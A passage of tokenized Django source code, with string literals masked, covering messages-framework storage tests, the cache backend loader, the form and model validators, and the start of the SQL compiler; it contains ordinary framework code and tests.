SUCCESS , '<STR_LIT>' ) <EOL> class BaseTest ( TestCase ) : <EOL> storage_class = default_storage <EOL> restore_settings = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> urls = '<STR_LIT>' <EOL> levels = { <EOL> '<STR_LIT>' : constants . DEBUG , <EOL> '<STR_LIT:info>' : constants . INFO , <EOL> '<STR_LIT:success>' : constants . SUCCESS , <EOL> '<STR_LIT>' : constants . WARNING , <EOL> '<STR_LIT:error>' : constants . ERROR , <EOL> } <EOL> def setUp ( self ) : <EOL> self . _remembered_settings = { } <EOL> for setting in self . restore_settings : <EOL> if hasattr ( settings , setting ) : <EOL> self . _remembered_settings [ setting ] = getattr ( settings , setting ) <EOL> delattr ( settings . _wrapped , setting ) <EOL> self . _middleware_classes = settings . MIDDLEWARE_CLASSES <EOL> self . 
_template_context_processors = settings . TEMPLATE_CONTEXT_PROCESSORS <EOL> self . _installed_apps = settings . INSTALLED_APPS <EOL> self . _message_storage = settings . MESSAGE_STORAGE <EOL> settings . MESSAGE_STORAGE = '<STR_LIT>' % ( self . storage_class . __module__ , <EOL> self . storage_class . __name__ ) <EOL> self . old_TEMPLATE_DIRS = settings . TEMPLATE_DIRS <EOL> settings . TEMPLATE_DIRS = ( ) <EOL> self . save_warnings_state ( ) <EOL> warnings . filterwarnings ( '<STR_LIT:ignore>' , category = DeprecationWarning , <EOL> module = '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> for setting in self . restore_settings : <EOL> self . restore_setting ( setting ) <EOL> settings . MIDDLEWARE_CLASSES = self . _middleware_classes <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS = self . _template_context_processors <EOL> settings . INSTALLED_APPS = self . _installed_apps <EOL> settings . MESSAGE_STORAGE = self . _message_storage <EOL> settings . TEMPLATE_DIRS = self . old_TEMPLATE_DIRS <EOL> self . restore_warnings_state ( ) <EOL> def restore_setting ( self , setting ) : <EOL> if setting in self . _remembered_settings : <EOL> value = self . _remembered_settings . pop ( setting ) <EOL> setattr ( settings , setting , value ) <EOL> elif hasattr ( settings , setting ) : <EOL> delattr ( settings . _wrapped , setting ) <EOL> def get_request ( self ) : <EOL> return http . HttpRequest ( ) <EOL> def get_response ( self ) : <EOL> return http . HttpResponse ( ) <EOL> def get_storage ( self , data = None ) : <EOL> """<STR_LIT>""" <EOL> storage = self . storage_class ( self . get_request ( ) ) <EOL> storage . _loaded_data = data or [ ] <EOL> return storage <EOL> def test_add ( self ) : <EOL> storage = self . get_storage ( ) <EOL> self . assertFalse ( storage . added_new ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> self . assertTrue ( storage . added_new ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' , extra_tags = '<STR_LIT>' ) <EOL> self . 
assertEqual ( len ( storage ) , <NUM_LIT:2> ) <EOL> def test_add_lazy_translation ( self ) : <EOL> storage = self . get_storage ( ) <EOL> response = self . get_response ( ) <EOL> storage . add ( constants . INFO , ugettext_lazy ( '<STR_LIT>' ) ) <EOL> storage . update ( response ) <EOL> storing = self . stored_messages_count ( storage , response ) <EOL> self . assertEqual ( storing , <NUM_LIT:1> ) <EOL> def test_no_update ( self ) : <EOL> storage = self . get_storage ( ) <EOL> response = self . get_response ( ) <EOL> storage . update ( response ) <EOL> storing = self . stored_messages_count ( storage , response ) <EOL> self . assertEqual ( storing , <NUM_LIT:0> ) <EOL> def test_add_update ( self ) : <EOL> storage = self . get_storage ( ) <EOL> response = self . get_response ( ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' , extra_tags = '<STR_LIT>' ) <EOL> storage . update ( response ) <EOL> storing = self . stored_messages_count ( storage , response ) <EOL> self . assertEqual ( storing , <NUM_LIT:2> ) <EOL> def test_existing_add_read_update ( self ) : <EOL> storage = self . get_existing_storage ( ) <EOL> response = self . get_response ( ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> list ( storage ) <EOL> storage . update ( response ) <EOL> storing = self . stored_messages_count ( storage , response ) <EOL> self . assertEqual ( storing , <NUM_LIT:0> ) <EOL> def test_existing_read_add_update ( self ) : <EOL> storage = self . get_existing_storage ( ) <EOL> response = self . get_response ( ) <EOL> list ( storage ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> storage . update ( response ) <EOL> storing = self . stored_messages_count ( storage , response ) <EOL> self . assertEqual ( storing , <NUM_LIT:1> ) <EOL> def test_full_request_response_cycle ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MESSAGE_LEVEL = constants . 
DEBUG <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> for level in ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT:success>' , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> response = self . client . post ( add_url , data , follow = True ) <EOL> self . assertRedirects ( response , show_url ) <EOL> self . assertTrue ( '<STR_LIT>' in response . context ) <EOL> messages = [ Message ( self . levels [ level ] , msg ) for msg in <EOL> data [ '<STR_LIT>' ] ] <EOL> self . assertEqual ( list ( response . context [ '<STR_LIT>' ] ) , messages ) <EOL> for msg in data [ '<STR_LIT>' ] : <EOL> self . assertContains ( response , msg ) <EOL> def test_with_template_response ( self ) : <EOL> settings . MESSAGE_LEVEL = constants . DEBUG <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> for level in self . levels . keys ( ) : <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> response = self . client . post ( add_url , data , follow = True ) <EOL> self . assertRedirects ( response , show_url ) <EOL> self . assertTrue ( '<STR_LIT>' in response . context ) <EOL> for msg in data [ '<STR_LIT>' ] : <EOL> self . assertContains ( response , msg ) <EOL> response = self . client . get ( show_url ) <EOL> for msg in data [ '<STR_LIT>' ] : <EOL> self . assertNotContains ( response , msg ) <EOL> def test_multiple_posts ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MESSAGE_LEVEL = constants . DEBUG <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> messages = [ ] <EOL> for level in ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT:success>' , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> messages . extend ( [ Message ( self . 
levels [ level ] , msg ) for msg in <EOL> data [ '<STR_LIT>' ] ] ) <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> self . client . post ( add_url , data ) <EOL> response = self . client . get ( show_url ) <EOL> self . assertTrue ( '<STR_LIT>' in response . context ) <EOL> self . assertEqual ( list ( response . context [ '<STR_LIT>' ] ) , messages ) <EOL> for msg in data [ '<STR_LIT>' ] : <EOL> self . assertContains ( response , msg ) <EOL> @ skipUnlessAuthIsInstalled <EOL> def test_middleware_disabled_auth_user ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MESSAGE_LEVEL = constants . DEBUG <EOL> user = User . objects . create_user ( '<STR_LIT:test>' , '<STR_LIT>' , '<STR_LIT:test>' ) <EOL> self . client . login ( username = '<STR_LIT:test>' , password = '<STR_LIT:test>' ) <EOL> settings . INSTALLED_APPS = list ( settings . INSTALLED_APPS ) <EOL> settings . INSTALLED_APPS . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . MIDDLEWARE_CLASSES = list ( settings . MIDDLEWARE_CLASSES ) <EOL> settings . MIDDLEWARE_CLASSES . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS = list ( settings . TEMPLATE_CONTEXT_PROCESSORS ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> for level in ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT:success>' , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> response = self . client . post ( add_url , data , follow = True ) <EOL> self . assertRedirects ( response , show_url ) <EOL> self . assertTrue ( '<STR_LIT>' in response . context ) <EOL> context_messages = list ( response . context [ '<STR_LIT>' ] ) <EOL> for msg in data [ '<STR_LIT>' ] : <EOL> self . assertTrue ( msg in context_messages ) <EOL> self . 
assertContains ( response , msg ) <EOL> def test_middleware_disabled_anon_user ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MESSAGE_LEVEL = constants . DEBUG <EOL> settings . INSTALLED_APPS = list ( settings . INSTALLED_APPS ) <EOL> settings . INSTALLED_APPS . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . MIDDLEWARE_CLASSES = list ( settings . MIDDLEWARE_CLASSES ) <EOL> settings . MIDDLEWARE_CLASSES . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS = list ( settings . TEMPLATE_CONTEXT_PROCESSORS ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> for level in ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT:success>' , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> self . assertRaises ( MessageFailure , self . client . post , add_url , <EOL> data , follow = True ) <EOL> def test_middleware_disabled_anon_user_fail_silently ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MESSAGE_LEVEL = constants . DEBUG <EOL> settings . INSTALLED_APPS = list ( settings . INSTALLED_APPS ) <EOL> settings . INSTALLED_APPS . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . MIDDLEWARE_CLASSES = list ( settings . MIDDLEWARE_CLASSES ) <EOL> settings . MIDDLEWARE_CLASSES . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS = list ( settings . TEMPLATE_CONTEXT_PROCESSORS ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS . 
remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> for level in ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT:success>' , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> response = self . client . post ( add_url , data , follow = True ) <EOL> self . assertRedirects ( response , show_url ) <EOL> self . assertTrue ( '<STR_LIT>' in response . context ) <EOL> self . assertEqual ( list ( response . context [ '<STR_LIT>' ] ) , [ ] ) <EOL> def stored_messages_count ( self , storage , response ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def test_get ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def get_existing_storage ( self ) : <EOL> return self . get_storage ( [ Message ( constants . INFO , '<STR_LIT>' ) , <EOL> Message ( constants . INFO , '<STR_LIT>' , <EOL> extra_tags = '<STR_LIT>' ) ] ) <EOL> def test_existing_read ( self ) : <EOL> """<STR_LIT>""" <EOL> storage = self . get_existing_storage ( ) <EOL> self . assertFalse ( storage . used ) <EOL> data = list ( storage ) <EOL> self . assertTrue ( storage . used ) <EOL> self . assertEqual ( data , list ( storage ) ) <EOL> def test_existing_add ( self ) : <EOL> storage = self . get_existing_storage ( ) <EOL> self . assertFalse ( storage . added_new ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> self . assertTrue ( storage . added_new ) <EOL> def test_default_level ( self ) : <EOL> request = self . get_request ( ) <EOL> self . assertEqual ( get_level ( request ) , constants . INFO ) <EOL> storage = self . get_storage ( ) <EOL> request . _messages = storage <EOL> self . assertEqual ( get_level ( request ) , constants . INFO ) <EOL> add_level_messages ( storage ) <EOL> self . 
assertEqual ( len ( storage ) , <NUM_LIT:5> ) <EOL> def test_low_level ( self ) : <EOL> request = self . get_request ( ) <EOL> storage = self . storage_class ( request ) <EOL> request . _messages = storage <EOL> self . assertTrue ( set_level ( request , <NUM_LIT:5> ) ) <EOL> self . assertEqual ( get_level ( request ) , <NUM_LIT:5> ) <EOL> add_level_messages ( storage ) <EOL> self . assertEqual ( len ( storage ) , <NUM_LIT:6> ) <EOL> def test_high_level ( self ) : <EOL> request = self . get_request ( ) <EOL> storage = self . storage_class ( request ) <EOL> request . _messages = storage <EOL> self . assertTrue ( set_level ( request , <NUM_LIT:30> ) ) <EOL> self . assertEqual ( get_level ( request ) , <NUM_LIT:30> ) <EOL> add_level_messages ( storage ) <EOL> self . assertEqual ( len ( storage ) , <NUM_LIT:2> ) <EOL> def test_settings_level ( self ) : <EOL> request = self . get_request ( ) <EOL> storage = self . storage_class ( request ) <EOL> settings . MESSAGE_LEVEL = <NUM_LIT> <EOL> self . assertEqual ( get_level ( request ) , <NUM_LIT> ) <EOL> add_level_messages ( storage ) <EOL> self . assertEqual ( len ( storage ) , <NUM_LIT:3> ) <EOL> def test_tags ( self ) : <EOL> storage = self . get_storage ( ) <EOL> storage . level = <NUM_LIT:0> <EOL> add_level_messages ( storage ) <EOL> tags = [ msg . tags for msg in storage ] <EOL> self . assertEqual ( tags , <EOL> [ '<STR_LIT:info>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:error>' , <EOL> '<STR_LIT:success>' ] ) <EOL> def test_custom_tags ( self ) : <EOL> settings . MESSAGE_TAGS = { <EOL> constants . INFO : '<STR_LIT:info>' , <EOL> constants . DEBUG : '<STR_LIT>' , <EOL> constants . WARNING : '<STR_LIT>' , <EOL> constants . ERROR : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> base . LEVEL_TAGS = utils . get_level_tags ( ) <EOL> try : <EOL> storage = self . get_storage ( ) <EOL> storage . level = <NUM_LIT:0> <EOL> add_level_messages ( storage ) <EOL> tags = [ msg . 
tags for msg in storage ] <EOL> self . assertEqual ( tags , <EOL> [ '<STR_LIT:info>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:success>' ] ) <EOL> finally : <EOL> self . restore_setting ( '<STR_LIT>' ) <EOL> base . LEVEL_TAGS = utils . get_level_tags ( ) </s>
<s> """<STR_LIT>""" <EOL> from django . conf import settings <EOL> from django . core import signals <EOL> from django . core . cache . backends . base import ( <EOL> InvalidCacheBackendError , CacheKeyWarning , BaseCache ) <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . utils import importlib <EOL> try : <EOL> from mod_python . util import parse_qsl <EOL> except ImportError : <EOL> try : <EOL> from urlparse import parse_qsl <EOL> except ImportError : <EOL> from cgi import parse_qsl <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> BACKENDS = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:file>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> DEFAULT_CACHE_ALIAS = '<STR_LIT:default>' <EOL> def parse_backend_uri ( backend_uri ) : <EOL> """<STR_LIT>""" <EOL> if backend_uri . find ( '<STR_LIT::>' ) == - <NUM_LIT:1> : <EOL> raise InvalidCacheBackendError ( "<STR_LIT>" ) <EOL> scheme , rest = backend_uri . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> if not rest . startswith ( '<STR_LIT>' ) : <EOL> raise InvalidCacheBackendError ( "<STR_LIT>" ) <EOL> host = rest [ <NUM_LIT:2> : ] <EOL> qpos = rest . find ( '<STR_LIT:?>' ) <EOL> if qpos != - <NUM_LIT:1> : <EOL> params = dict ( parse_qsl ( rest [ qpos + <NUM_LIT:1> : ] ) ) <EOL> host = rest [ <NUM_LIT:2> : qpos ] <EOL> else : <EOL> params = { } <EOL> if host . endswith ( '<STR_LIT:/>' ) : <EOL> host = host [ : - <NUM_LIT:1> ] <EOL> return scheme , host , params <EOL> if not settings . CACHES : <EOL> legacy_backend = getattr ( settings , '<STR_LIT>' , None ) <EOL> if legacy_backend : <EOL> import warnings <EOL> warnings . warn ( <EOL> "<STR_LIT>" , <EOL> PendingDeprecationWarning <EOL> ) <EOL> else : <EOL> settings . 
CACHE_BACKEND = '<STR_LIT>' <EOL> backend_classes = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:file>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> engine , host , params = parse_backend_uri ( settings . CACHE_BACKEND ) <EOL> if engine in backend_classes : <EOL> engine = '<STR_LIT>' % backend_classes [ engine ] <EOL> else : <EOL> engine = '<STR_LIT>' % engine <EOL> defaults = { <EOL> '<STR_LIT>' : engine , <EOL> '<STR_LIT>' : host , <EOL> } <EOL> defaults . update ( params ) <EOL> settings . CACHES [ DEFAULT_CACHE_ALIAS ] = defaults <EOL> if DEFAULT_CACHE_ALIAS not in settings . CACHES : <EOL> raise ImproperlyConfigured ( "<STR_LIT>" % DEFAULT_CACHE_ALIAS ) <EOL> def parse_backend_conf ( backend , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> conf = settings . CACHES . get ( backend , None ) <EOL> if conf is not None : <EOL> args = conf . copy ( ) <EOL> args . update ( kwargs ) <EOL> backend = args . pop ( '<STR_LIT>' ) <EOL> location = args . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return backend , location , args <EOL> else : <EOL> mod_path , cls_name = backend . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> try : <EOL> mod = importlib . import_module ( mod_path ) <EOL> backend_cls = getattr ( mod , cls_name ) <EOL> except ( AttributeError , ImportError ) : <EOL> raise InvalidCacheBackendError ( "<STR_LIT>" % backend ) <EOL> location = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return backend , location , kwargs <EOL> raise InvalidCacheBackendError ( <EOL> "<STR_LIT>" % backend ) <EOL> def get_cache ( backend , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if '<STR_LIT>' in backend : <EOL> backend , location , params = parse_backend_uri ( backend ) <EOL> if backend in BACKENDS : <EOL> backend = '<STR_LIT>' % BACKENDS [ backend ] <EOL> params . update ( kwargs ) <EOL> mod = importlib . import_module ( backend ) <EOL> backend_cls = mod . 
CacheClass <EOL> else : <EOL> backend , location , params = parse_backend_conf ( backend , ** kwargs ) <EOL> mod_path , cls_name = backend . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> mod = importlib . import_module ( mod_path ) <EOL> backend_cls = getattr ( mod , cls_name ) <EOL> except ( AttributeError , ImportError ) , e : <EOL> raise InvalidCacheBackendError ( <EOL> "<STR_LIT>" % ( backend , e ) ) <EOL> return backend_cls ( location , params ) <EOL> cache = get_cache ( DEFAULT_CACHE_ALIAS ) <EOL> if hasattr ( cache , '<STR_LIT>' ) : <EOL> signals . request_finished . connect ( cache . close ) </s>
<s> import platform <EOL> import re <EOL> import urllib2 <EOL> import urlparse <EOL> from django . core . exceptions import ValidationError <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . encoding import smart_unicode <EOL> EMPTY_VALUES = ( None , '<STR_LIT>' , [ ] , ( ) , { } ) <EOL> try : <EOL> from django . conf import settings <EOL> URL_VALIDATOR_USER_AGENT = settings . URL_VALIDATOR_USER_AGENT <EOL> except ImportError : <EOL> URL_VALIDATOR_USER_AGENT = '<STR_LIT>' <EOL> class RegexValidator ( object ) : <EOL> regex = '<STR_LIT>' <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> def __init__ ( self , regex = None , message = None , code = None ) : <EOL> if regex is not None : <EOL> self . regex = regex <EOL> if message is not None : <EOL> self . message = message <EOL> if code is not None : <EOL> self . code = code <EOL> if isinstance ( self . regex , basestring ) : <EOL> self . regex = re . compile ( regex ) <EOL> def __call__ ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if not self . regex . search ( smart_unicode ( value ) ) : <EOL> raise ValidationError ( self . message , code = self . code ) <EOL> class URLValidator ( RegexValidator ) : <EOL> regex = re . compile ( <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , re . IGNORECASE ) <EOL> def __init__ ( self , verify_exists = False , <EOL> validator_user_agent = URL_VALIDATOR_USER_AGENT ) : <EOL> super ( URLValidator , self ) . __init__ ( ) <EOL> self . verify_exists = verify_exists <EOL> self . user_agent = validator_user_agent <EOL> def __call__ ( self , value ) : <EOL> try : <EOL> super ( URLValidator , self ) . __call__ ( value ) <EOL> except ValidationError , e : <EOL> if value : <EOL> value = smart_unicode ( value ) <EOL> scheme , netloc , path , query , fragment = urlparse . urlsplit ( value ) <EOL> try : <EOL> netloc = netloc . 
encode ( '<STR_LIT>' ) <EOL> except UnicodeError : <EOL> raise e <EOL> url = urlparse . urlunsplit ( ( scheme , netloc , path , query , fragment ) ) <EOL> super ( URLValidator , self ) . __call__ ( url ) <EOL> else : <EOL> raise <EOL> else : <EOL> url = value <EOL> if self . verify_exists : <EOL> headers = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . user_agent , <EOL> } <EOL> url = url . encode ( '<STR_LIT:utf-8>' ) <EOL> broken_error = ValidationError ( <EOL> _ ( u'<STR_LIT>' ) , code = '<STR_LIT>' ) <EOL> try : <EOL> req = urllib2 . Request ( url , None , headers ) <EOL> req . get_method = lambda : '<STR_LIT>' <EOL> opener = urllib2 . OpenerDirector ( ) <EOL> error_nop = lambda * args , ** kwargs : True <EOL> http_error_processor = urllib2 . HTTPErrorProcessor ( ) <EOL> http_error_processor . http_error_301 = error_nop <EOL> http_error_processor . http_error_302 = error_nop <EOL> http_error_processor . http_error_307 = error_nop <EOL> handlers = [ urllib2 . UnknownHandler ( ) , <EOL> urllib2 . HTTPHandler ( ) , <EOL> urllib2 . HTTPDefaultErrorHandler ( ) , <EOL> urllib2 . FTPHandler ( ) , <EOL> http_error_processor ] <EOL> try : <EOL> import ssl <EOL> handlers . append ( urllib2 . HTTPSHandler ( ) ) <EOL> except : <EOL> pass <EOL> map ( opener . add_handler , handlers ) <EOL> if platform . python_version_tuple ( ) >= ( <NUM_LIT:2> , <NUM_LIT:6> ) : <EOL> opener . open ( req , timeout = <NUM_LIT:10> ) <EOL> else : <EOL> opener . 
open ( req ) <EOL> except ValueError : <EOL> raise ValidationError ( _ ( u'<STR_LIT>' ) , code = '<STR_LIT>' ) <EOL> except : <EOL> raise broken_error <EOL> def validate_integer ( value ) : <EOL> try : <EOL> int ( value ) <EOL> except ( ValueError , TypeError ) , e : <EOL> raise ValidationError ( '<STR_LIT>' ) <EOL> class EmailValidator ( RegexValidator ) : <EOL> def __call__ ( self , value ) : <EOL> try : <EOL> super ( EmailValidator , self ) . __call__ ( value ) <EOL> except ValidationError , e : <EOL> if value and u'<STR_LIT:@>' in value : <EOL> parts = value . split ( u'<STR_LIT:@>' ) <EOL> domain_part = parts [ - <NUM_LIT:1> ] <EOL> try : <EOL> parts [ - <NUM_LIT:1> ] = parts [ - <NUM_LIT:1> ] . encode ( '<STR_LIT>' ) <EOL> except UnicodeError : <EOL> raise e <EOL> super ( EmailValidator , self ) . __call__ ( u'<STR_LIT:@>' . join ( parts ) ) <EOL> else : <EOL> raise <EOL> email_re = re . compile ( <EOL> r"<STR_LIT>" <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , re . IGNORECASE ) <EOL> validate_email = EmailValidator ( email_re , _ ( u'<STR_LIT>' ) , '<STR_LIT>' ) <EOL> slug_re = re . compile ( r'<STR_LIT>' ) <EOL> validate_slug = RegexValidator ( slug_re , _ ( u"<STR_LIT>" ) , '<STR_LIT>' ) <EOL> ipv4_re = re . compile ( r'<STR_LIT>' ) <EOL> validate_ipv4_address = RegexValidator ( ipv4_re , _ ( u'<STR_LIT>' ) , '<STR_LIT>' ) <EOL> comma_separated_int_list_re = re . compile ( '<STR_LIT>' ) <EOL> validate_comma_separated_integer_list = RegexValidator ( comma_separated_int_list_re , _ ( u'<STR_LIT>' ) , '<STR_LIT>' ) <EOL> class BaseValidator ( object ) : <EOL> compare = lambda self , a , b : a is not b <EOL> clean = lambda self , x : x <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> def __init__ ( self , limit_value ) : <EOL> self . limit_value = limit_value <EOL> def __call__ ( self , value ) : <EOL> cleaned = self . clean ( value ) <EOL> params = { '<STR_LIT>' : self . limit_value , '<STR_LIT>' : cleaned } <EOL> if self . 
compare ( cleaned , self . limit_value ) : <EOL> raise ValidationError ( <EOL> self . message % params , <EOL> code = self . code , <EOL> params = params , <EOL> ) <EOL> class MaxValueValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a > b <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MinValueValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a < b <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MinLengthValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a < b <EOL> clean = lambda self , x : len ( x ) <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MaxLengthValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a > b <EOL> clean = lambda self , x : len ( x ) <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT:max_length>' </s>
<s> from django . core . exceptions import FieldError <EOL> from django . db import connections <EOL> from django . db . backends . util import truncate_name <EOL> from django . db . models . sql . constants import * <EOL> from django . db . models . sql . datastructures import EmptyResultSet <EOL> from django . db . models . sql . expressions import SQLEvaluator <EOL> from django . db . models . sql . query import get_proxied_model , get_order_dir , select_related_descend , Query <EOL> class SQLCompiler ( object ) : <EOL> def __init__ ( self , query , connection , using ) : <EOL> self . query = query <EOL> self . connection = connection <EOL> self . using = using <EOL> self . quote_cache = { } <EOL> def pre_sql_setup ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . query . tables : <EOL> self . query . join ( ( None , self . query . model . _meta . db_table , None , None ) ) <EOL> if ( not self . query . select and self . query . default_cols and not <EOL> self . query . included_inherited_models ) : <EOL> self . query . setup_inherited_models ( ) <EOL> if self . query . select_related and not self . query . related_select_cols : <EOL> self . fill_related_selections ( ) <EOL> def quote_name_unless_alias ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if name in self . quote_cache : <EOL> return self . quote_cache [ name ] <EOL> if ( ( name in self . query . alias_map and name not in self . query . table_map ) or <EOL> name in self . query . extra_select ) : <EOL> self . quote_cache [ name ] = name <EOL> return name <EOL> r = self . connection . ops . quote_name ( name ) <EOL> self . quote_cache [ name ] = r <EOL> return r <EOL> def as_sql ( self , with_limits = True , with_col_aliases = False ) : <EOL> """<STR_LIT>""" <EOL> if with_limits and self . query . low_mark == self . query . high_mark : <EOL> return '<STR_LIT>' , ( ) <EOL> self . pre_sql_setup ( ) <EOL> out_cols = self . get_columns ( with_col_aliases ) <EOL> ordering , ordering_group_by = self . 
get_ordering ( ) <EOL> from_ , f_params = self . get_from_clause ( ) <EOL> qn = self . quote_name_unless_alias <EOL> where , w_params = self . query . where . as_sql ( qn = qn , connection = self . connection ) <EOL> having , h_params = self . query . having . as_sql ( qn = qn , connection = self . connection ) <EOL> params = [ ] <EOL> for val in self . query . extra_select . itervalues ( ) : <EOL> params . extend ( val [ <NUM_LIT:1> ] ) <EOL> result = [ '<STR_LIT>' ] <EOL> if self . query . distinct : <EOL> result . append ( '<STR_LIT>' ) <EOL> result . append ( '<STR_LIT:U+002CU+0020>' . join ( out_cols + self . query . ordering_aliases ) ) <EOL> result . append ( '<STR_LIT>' ) <EOL> result . extend ( from_ ) <EOL> params . extend ( f_params ) <EOL> if where : <EOL> result . append ( '<STR_LIT>' % where ) <EOL> params . extend ( w_params ) <EOL> grouping , gb_params = self . get_grouping ( ) <EOL> if grouping : <EOL> if ordering : <EOL> if not self . connection . features . allows_group_by_pk : <EOL> for col , col_params in ordering_group_by : <EOL> if col not in grouping : <EOL> grouping . append ( str ( col ) ) <EOL> gb_params . extend ( col_params ) <EOL> else : 